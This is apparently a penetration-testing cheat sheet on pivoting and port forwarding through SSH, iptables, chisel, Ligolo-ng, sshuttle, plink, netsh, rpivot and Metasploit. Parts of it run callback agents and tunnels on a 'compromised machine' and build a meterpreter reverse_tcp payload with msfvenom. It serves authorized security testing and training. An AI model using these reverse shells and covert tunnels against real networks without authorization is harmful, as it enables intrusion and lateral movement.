# Pivoting / Forwarding

## 00. Basic

```bash
## ------------------| Check arp table
arp -an
```

* Port forwarding from another machine into the VPN that only the Kali VM can reach

```bash
## ------------------| Scenario
### Machine-A (192.168.1.130) – source machine, no VPN
### Machine-B (192.168.10.3) – relay machine (the VM holding the VPN, 10.10.xx.xxx)
### Goal: HTTP (port 80) from Machine-A to 10.10.11.123, a host only Machine-B can reach

## ------------------| Method I (SSH Reverse Tunnel)
### Step 1: from Machine-B (the side that can reach the target), open a reverse tunnel to Machine-A.
### -R puts the listener on the SSH *server* (Machine-A, loopback only by default); Machine-B makes the
### connection to the target.
ssh -R 8080:10.10.11.123:80 Machine-A
### Step 2: on Machine-A, make the forward transparent. Restrict the REDIRECT to the target address,
### otherwise every outbound port-80 connection from Machine-A is hijacked into the tunnel.
sudo iptables -t nat -A OUTPUT -p tcp -d 10.10.11.123 --dport 80 -j REDIRECT --to-port 8080
### Check from Machine-A
curl -sI http://10.10.11.123/        ## via the REDIRECT rule
curl -sI http://127.0.0.1:8080/      ## straight at the tunnel, no iptables needed
### Same result started from Machine-A instead (local forward, Machine-A must be able to SSH to Machine-B):
ssh -L 8080:10.10.11.123:80 Machine-B

## ------------------| Method II (SOCKS Proxy) - Full Traffic Redirection for proxy-aware tools
### Step 1: from Machine-A, open a dynamic forward to Machine-B. The SOCKS listener lives on the SSH
### client (Machine-A); connections exit from Machine-B, inside the VPN.
ssh -D 1080 -N -f Machine-B
### Alternative from Machine-B (OpenSSH 7.6+): reverse dynamic forward, SOCKS listener opens on Machine-A
ssh -R 1080 -N -f Machine-A
### Step 2: point tools on Machine-A at the proxy. Use socks5h, not socks5, so hostnames are resolved by
### Machine-B instead of leaking DNS from Machine-A.
export http_proxy="socks5h://127.0.0.1:1080"
export https_proxy="socks5h://127.0.0.1:1080"
curl -sI http://10.10.11.123/
### Tools that ignore *_proxy: add "socks5 127.0.0.1 1080" to /etc/proxychains.conf and run them under proxychains

## ------------------| Method III (iptables & NAT) - Requires Root Access on Both Machines
### Step 1: on Machine-B, enable forwarding and NAT everything that leaves over the VPN interface
### (tun0 is assumed here; check the real name with `ip -br addr`). Without the MASQUERADE the target
### replies to 192.168.1.130, an address the VPN side cannot route back.
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo iptables -A FORWARD -p tcp -d 10.10.11.123 --dport 80 -j ACCEPT
sudo iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
### Step 2a: on Machine-A, route the target via Machine-B (Machine-B must be on-link, i.e. directly reachable,
### for `via` to be accepted)
sudo ip route add 10.10.11.123 via 192.168.10.3
### Step 2b: if Machine-A cannot add routes, DNAT on Machine-B instead; Machine-A then talks to 192.168.10.3:80.
### Match on Machine-B's own address so only that traffic is rewritten.
sudo iptables -t nat -A PREROUTING -d 192.168.10.3 -p tcp --dport 80 -j DNAT --to-destination 10.10.11.123:80
### Check from Machine-A
curl -sI http://10.10.11.123/
```

## 01. Port Forwarding

### 01.0 [Ligolo-ng](https://github.com/tnpitsecurity/ligolo-ng)

```bash
## ------------------| Agent [target/victim computer]
## Fetch the latest release asset on Kali, then move the agent binary to the target
## (fetch ./proxy the same way, from the asset whose name contains "proxy")
## Windows 
wget -q --show-progress $(wget -qO- https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep "browser_download_url" | grep "windows_amd64.zip" | grep agent | awk -F '"' '{print $4}') -O /tmp/agent-windows.zip
unzip -j /tmp/agent-windows.zip -d $PWD agent.exe
## On the target: -ignore-cert accepts the proxy's self-signed certificate (fine in a lab, MITM-able elsewhere)
.\agent.exe -connect <MyIP>:11601 -ignore-cert
## Linux
wget -q --show-progress $(wget -qO- https://api.github.com/repos/nicocha30/ligolo-ng/releases/latest | grep "browser_download_url" | grep "linux_amd64.tar.gz" | grep agent | awk -F '"' '{print $4}') -O /tmp/agent-linux.tar.gz
tar -xvf /tmp/agent-linux.tar.gz -C $PWD agent
./agent -connect <MyIP>:11601 -ignore-cert

## ------------------| Server [My Computer]
## One-time: a tun interface owned by the unprivileged user that will run the proxy
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
## proxy listens on 0.0.0.0:11601 by default; -selfcert generates the certificate the agent ignores above
./proxy -selfcert
## Inside the ligolo-ng prompt, once the agent has checked in:
session        ## select the agent session
ifconfig       ## list the agent's interfaces to learn the internal range
## In a second terminal: route the internal range into the tun interface
sudo ip route add <IPRange>/24 dev ligolo ## Ex: 172.17.0.0/24 
## Back in the ligolo-ng prompt:
start          ## bring the tunnel up
## Scan live hosts (ICMP works through ligolo, unlike a SOCKS pivot)
fping -a -g 172.17.0.0/24
```

### 01.1 SSH Port Forward

```bash
##  -N   Do not execute a remote command.  This is useful for just forwarding ports.
##  -f   Go to the background after authentication (pair with -N)
## ~C    Escape to the "ssh>" prompt inside an already-open session; type it at the start of a line
##       (right after Enter). Forwards added there (-L/-R/-D) take effect without reconnecting.

## ------------------| Local Port Forward
## Local Host <--> SSH Server <--> Remote Host
## A listener on our host; connections go through the SSH server to <remote_ip>:<remote_port>
ssh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>
autossh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>   ## re-establishes the tunnel if it drops
## ex: ssh -L 3306:127.0.0.1:3306 admin@sshserver.local

## 3306 is the port on the pivot machine (127.0.0.1 from its point of view)
## 1337 is our machine's port
ssh> -L 1337:127.0.0.1:3306 
ssh -L 1337:127.0.0.1:3306 <user>@<machine_to_pivot>
## The listener binds to loopback by default; -L 0.0.0.0:1337:... exposes the forward to your whole network

## ------------------| Remote Port Forward
## Remote Host <--> SSH Server <--> Local Host
## A listener on the SSH server; connections come back through the client to <target_ip>:<target_port>
ssh -R <sshserver_port>:<target_ip>:<target_port> <user>@<sshserverip>

## Run this ON the compromised machine, pointing at our box:
## 3306 is the compromised machine's port, 1337 opens on our machine
ssh -R 1337:127.0.0.1:3306 <user>@<our_ip>

## ------------------| Dynamic Port Forward (Use with proxychains)
ssh> -D 1080

## Config proxychains
sudo vi /etc/proxychains.conf
socks5 127.0.0.1 1080
ssh -D 127.0.0.1:1080 <user>@<machine_to_pivot>
ssh -D 127.0.0.1:1080 -f -N <user>@<machine_to_pivot>
## Launch nmap: -sT (full connect) and -Pn (no ping) because SOCKS carries TCP only; -n avoids DNS leaks
proxychains nmap -sT -Pn -n 172.16.1.0/24
```
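The proxychains config is edited by hand above, and again in the chisel, ncat, rpivot and Metasploit sections, so stale hops from a previous pivot are easy to leave behind and `proxy_dns` is easy to forget. The helper below is an added example, not code from the page or from proxychains-ng: it rewrites the `[ProxyList]` section with exactly the hops you pass (validated, first hop nearest to you for `strict_chain`), lists what is active, and turns `proxy_dns` on so lookups go through the pivot instead of leaking from the attacker box. The config path and the hop values in the usage line are assumptions; the tests run against a temporary file.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): manage the [ProxyList] section of a
# proxychains-ng config so the live pivot (ssh -D, chisel, rpivot, Metasploit
# socks_proxy, ncat http) is the only hop set, and force DNS through the pivot.
# Assumptions: proxychains-ng syntax; hops are passed as "type host port" strings.
set -eu

# A hop is valid when the type is one proxychains understands and the port is 1-65535.
pc_validate_hop() {
    local type=$1 host=$2 port=$3
    case "$type" in socks4|socks5|http) ;; *) return 1 ;; esac
    [ -n "$host" ] || return 1
    case "$port" in ''|*[!0-9]*) return 1 ;; esac
    [ "$port" -ge 1 ] && [ "$port" -le 65535 ]
}

# Replace everything below [ProxyList] with the given hops. Under strict_chain
# proxychains walks them in listed order, so the hop nearest to us goes first.
# Any invalid hop rejects the whole set and leaves the file untouched.
pc_set_hops() {
    local conf=$1 tmp hop type host port
    shift
    tmp=$(mktemp)
    awk '{print} /^\[ProxyList\]/{exit}' "$conf" > "$tmp"          # keep header, drop old hops
    grep -q '^\[ProxyList\]' "$tmp" || printf '[ProxyList]\n' >> "$tmp"
    for hop in "$@"; do
        type=${hop%% *}
        port=${hop##* }
        host=${hop#* }; host=${host% *}
        if ! pc_validate_hop "$type" "$host" "$port"; then
            rm -f "$tmp"
            echo "rejecting hop '$hop'" >&2
            return 1
        fi
        printf '%s\t%s\t%s\n' "$type" "$host" "$port" >> "$tmp"
    done
    cat "$tmp" > "$conf"    # cat, not mv: keeps the config's owner and mode
    rm -f "$tmp"
}

# Print the active hops, one "type host port" per line (comments skipped).
pc_hops() {
    awk 'p && NF && $1 !~ /^#/ {print $1, $2, $3} /^\[ProxyList\]/ {p=1}' "$1"
}

# Ensure proxy_dns is on: uncomment it if present, insert it above [ProxyList]
# (or append it) if absent. Idempotent.
pc_enable_proxy_dns() {
    local conf=$1 tmp
    tmp=$(mktemp)
    sed 's/^#[[:space:]]*proxy_dns[[:space:]]*$/proxy_dns/' "$conf" > "$tmp"
    if grep -q '^proxy_dns' "$tmp"; then
        cat "$tmp" > "$conf"
    else
        awk '/^\[ProxyList\]/ && !done {print "proxy_dns"; done=1} {print}
             END {if (!done) print "proxy_dns"}' "$tmp" > "$conf"
    fi
    rm -f "$tmp"
}

# Usage (hop values are examples): ./pc-hops.sh /etc/proxychains.conf "socks5 127.0.0.1 1080" "http 10.10.110.100 1337"
if [ "$#" -ge 2 ]; then
    conf=$1; shift
    pc_set_hops "$conf" "$@"
    pc_enable_proxy_dns "$conf"
    pc_hops "$conf"
fi
```

Run it with `sudo` against `/etc/proxychains.conf` before each `proxychains nmap ...` and read back `pc_hops` output: if a SOCKS4 entry from an old rpivot session is still listed ahead of your new `ssh -D`, strict_chain will fail on the dead hop rather than use the live one.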

### 01.2 [Socat](https://www.redhat.com/sysadmin/getting-started-socat) Multipurpose relay

```bash
## ------------------| Normal
## Listen on 4444 and hand each connection to a local service (CUPS on 631 here); fork = one child per client
socat TCP-LISTEN:4444,fork,reuseaddr TCP:127.0.0.1:631
## Listen on one address only (here the VPN/tun address) and relay to local MySQL
socat TCP-LISTEN:4444,fork,reuseaddr,bind=10.10.14.26 TCP:127.0.0.1:3306

## ------------------| Send smb traffic from kali VM to windows VM
## Port 445 needs root and must be free on Kali (stop smbd first if it is running)
sudo socat TCP-LISTEN:445,fork,reuseaddr TCP:<WINDOWS_VM_IP>:445
```

### 01.3 Using [Chisel](https://github.com/jpillora/chisel/releases)

```bash
## ------------------| Normal
## Server side (our machine); --reverse lets clients open listeners on the server
./chisel server --reverse --port 1234 
## Client side (compromised machine): R:<server_port>:<host>:<port> opens server_port on our machine
## and relays it to host:port as seen from the client
./chisel client 10.10.14.26:1234 R:3000:127.0.0.1:3000 R:3001:127.0.0.1:3001 

## ------------------| SOCKS5 (With Proxychains)
## Server side
./chisel server --reverse --port 1234
## Client side: a SOCKS5 listener opens on our machine (port 1080); traffic exits at the client.
## 0.0.0.0 exposes that proxy to anyone who can reach our box; use R:127.0.0.1:1080:socks unless others need it
./chisel client 10.14.14.7:1234 R:0.0.0.0:1080:socks
## Edit /etc/proxychains.conf 
socks5   127.0.0.1   1080
## Use nmap with proxychains (-sT -Pn -n: SOCKS carries TCP only, no ping, no DNS leak)
```

### 01.4 Using [sshuttle](https://github.com/sshuttle/sshuttle)

```bash
## ------------------| For all routes
## sudo is for the local iptables/nft rules; the pivot only needs an SSH login and python, no root
sudo sshuttle -vvr root@10.10.110.100 0/0
sudo sshuttle -vr root@10.10.110.100 0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr root@10.10.110.100 0.0.0.0/0 --ssh-cmd "ssh -i ./id_rsa"
## --dns also sends DNS queries through the pivot
sudo sshuttle -vr root@10.10.110.100 0.0.0.0/0 --dns --ssh-cmd "ssh -i ./id_rsa"

## ------------------| For specific route
sudo sshuttle -vr root@10.10.110.100 172.16.1.0/24 --ssh-cmd "ssh -i ./id_rsa"
```

### 01.5 Using ncat tunnel

```bash
## ------------------| On the target/pivot machine: ncat acts as an HTTP CONNECT proxy
## It is unauthenticated, so restrict who may use it with --allow
ncat -vv --listen 1337 --proxy-type http --allow <AttackerIP>

## ------------------| Edit on the attacker machine (10.10.110.100 is the pivot running ncat)
## plain echo does not expand \t; use printf (or echo -e)
printf 'http\t10.10.110.100\t1337\n' | sudo tee -a /etc/proxychains.conf
# To verify
tail -2 /etc/proxychains.conf

## ------------------| Then use proxychains
proxychains nmap -sT -Pn -n 172.16.1.0/24
```

### 01.6 Using [httptunnel](https://github.com/larsbrinkhoff/httptunnel)

```bash
## ------------------| On Server (compromised machine): listen on 1337 for HTTP, unwrap to the local service on 3306
hts --forward-port localhost:3306 1337

## ------------------| On Client (attacker machine): local 3306 is wrapped in HTTP and sent to hts
htc --forward-port 3306 <compromised_ip>:1337
## then connect to 127.0.0.1:3306 locally
```

### 01.7 Using Plink.exe

```bash
## Kali ships plink.exe in the windows-binaries package; copy it to the Windows target
cp /usr/share/windows-resources/binaries/plink.exe .

## From the Windows target: expose its SMB port (445) on our machine's port 445 (needs root there and a free port);
## -N opens no shell, only the forward
.\plink.exe -N root@<OURIP> -R 445:127.0.0.1:445

## Non-interactive: accept the host key and pass the password; 1337 opens on our machine, forwarding to the target's 3306.
## Binding to <our_ip> instead of 127.0.0.1 needs "GatewayPorts yes" in our sshd_config
cmd.exe /c echo y | plink.exe -ssh -N -l <USER> -pw <PASSWORD> -R <our_ip>:1337:127.0.0.1:3306 <our_ip>
```

### 01.8 Using netsh.exe

```bash
## 3306 is the port on the remote (internal) machine
## 1337 is the port opened on the compromised machine (run from an elevated prompt)
netsh interface portproxy add v4tov4 listenport=1337 listenaddress=<compromised_ip> connectport=3306 connectaddress=<remote_ip>

## Add firewall rule for the same listen port
netsh advfirewall firewall add rule name="forward_port" protocol=TCP dir=in localip=<compromised_ip> localport=1337 action=allow

## Verify, and clean up when done
netsh interface portproxy show all
netsh interface portproxy delete v4tov4 listenport=1337 listenaddress=<compromised_ip>
netsh advfirewall firewall delete rule name="forward_port"
```

### 01.9 Using [rinetd](https://github.com/samhocevar/rinetd)

```bash
## ------------------| Forward port 80 on the attacker box to a host the restricted device cannot reach itself (e.g. google.com)
sudo vi /etc/rinetd.conf
### Add a forwarding rule: bindaddress bindport connectaddress connectport
0.0.0.0    80    <GoogleIPAddress>    80
### Restart service
sudo service rinetd restart

### Success ? (on the restricted machine)
nc -znv <AttackerIP> 80   
```

### 01.10 Using [rpivot.exe](https://github.com/klsecservices/rpivot) \[Best for Windows XP]

```bash
## ------------------| Start server on attacker machine (python2 only; the SOCKS4 listener opens on 127.0.0.1:1080 by default)
git clone https://github.com/klsecservices/rpivot.git && cd rpivot
python2 server.py --server-ip 0.0.0.0 --server-port 8989

## ------------------| Start rpivot on compromised machine (connects back to the server; traffic exits here)
wget https://github.com/klsecservices/rpivot/releases/download/v1.0/client.exe
.\client.exe --server-ip <IP> --server-port 8989

## ------------------| Proxy (rpivot speaks SOCKS4, so the entry is socks4, not socks5)
/etc/proxychains.conf
socks4	127.0.0.1	1080
proxychains nmap -sT -Pn -n -p 80 <IP>
```

### 01.11 Using Metasploit with Meterpreter

```bash
## ------------------| Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<MyIP> LPORT=7799 -f elf -o msf.bin    

## ------------------| Launch MSFConsole
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 7799
set lhost 10.10.14.13
run -j
sessions -l
sessions -i <session_id>

## ------------------| Method 0x01 (route + SOCKS: a whole subnet through the session)
route add <Compromised_IP_Address/24> <meterpreter_session_id>
## --> ex : route add 172.17.0.0/24 1
route print
use auxiliary/server/socks_proxy
set SRVPORT 1080 # edit this port on /etc/proxychains.conf (socks5; the module's VERSION defaults to 5)
run -j

## ------------------| Method 0x02 (a single port through the session)
## !! You must be on " meterpreter > " shell
portfwd add -l 8003 -p 3306 -r 172.17.0.2
    ## -l (8003) is the port that listens on our machine
    ## -p (3306) is the port on the internal host
    ## -r (172.17.0.2) is the internal host, reachable from the compromised machine
    ## then you can use 127.0.0.1:8003 from your end
portfwd list
```

